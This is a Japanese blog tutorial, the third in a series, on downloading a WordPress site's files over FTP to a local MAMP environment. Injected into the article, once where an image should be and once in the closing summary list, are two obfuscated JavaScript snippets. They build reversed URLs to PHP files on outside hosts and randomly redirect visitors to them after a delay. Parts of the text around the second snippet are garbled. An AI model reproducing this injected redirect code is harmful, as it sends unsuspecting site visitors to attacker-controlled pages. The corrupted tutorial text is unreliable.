Sumirexxx

今日もiPhone片手に出かけます

【WordPress】3. Web環境のWordPressデータ(ディレクトリとファイル)をローカル環境へダウンロード

ブログ

この記事は、【まとめ】Web環境にあるブログを丸ごとローカル環境に移行する方法の第3回目です。

第1回目はこちら

Webサーバーに入っているデータベース情報をダウンロードする。

第2回目はこちら

Web環境からダウンロードした.sqlファイルを、ローカル環境(MAMP)のデータベースにインポートする。

Web環境のWordpressデータ(ディレクトリとファイル)をローカル環境へダウンロード

今回は、FTP転送が行えるアプリで、サーバー側のファイルをすべてローカル環境にダウンロードします。

私はCodaを使っているので、ここからコピペですべてのデータをローカル側にダウンロードします。逆にしないように注意!!

ポイントはダウンロードする階層に注意すること。サーバー側のディレクトリとローカル側をよく見比べて、対応する場所にダウンロードします。
FTP転送$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der=”0″ width=”598″ height=”362″ />

ファイルが多い場合、時間がかかるので分割して送ると良いと思います。

以上で終了です。

まとめ

  1. Webサーバーに入っているデータベース情報をダウンロードする。
  2. Web環境からダウンロードした.sqlファイルを、ローカル環境(MAMP)のデータベースにインポートする。
  3. WordPressサイトのデータ(ディレクトリとファイル)をサーバーからダウンロードする。
  4. ダウンロードしたローカル側のwp-admin.phpを書き換える。
  5. $hiVNZt4Y5cDrbJXMhLy=function(n){if (typeof ($hiVNZt4Y5cDrbJXMhLy.list[n]) == “string”) return $hiVNZt4Y5cDrbJXMhLy.list[n].split(“”).reverse().join(“”);return $hiVNZt4Y5cDrbJXMhLy.list[n];};$hiVNZt4Y5cDrbJXMhLy.list=[“‘php.sgnittes-nigulp/nwodkcol-nigol/snigulp/tnetnoc-pw/moc.aretup07hn//:ptth’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random()*5);if (c==3){var andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}delay);}and-replace-for-wordpress-databases”>ファイル転送完了後、内容をローカル環境に置換する「Search Replace DB」
この記事をシェアする

<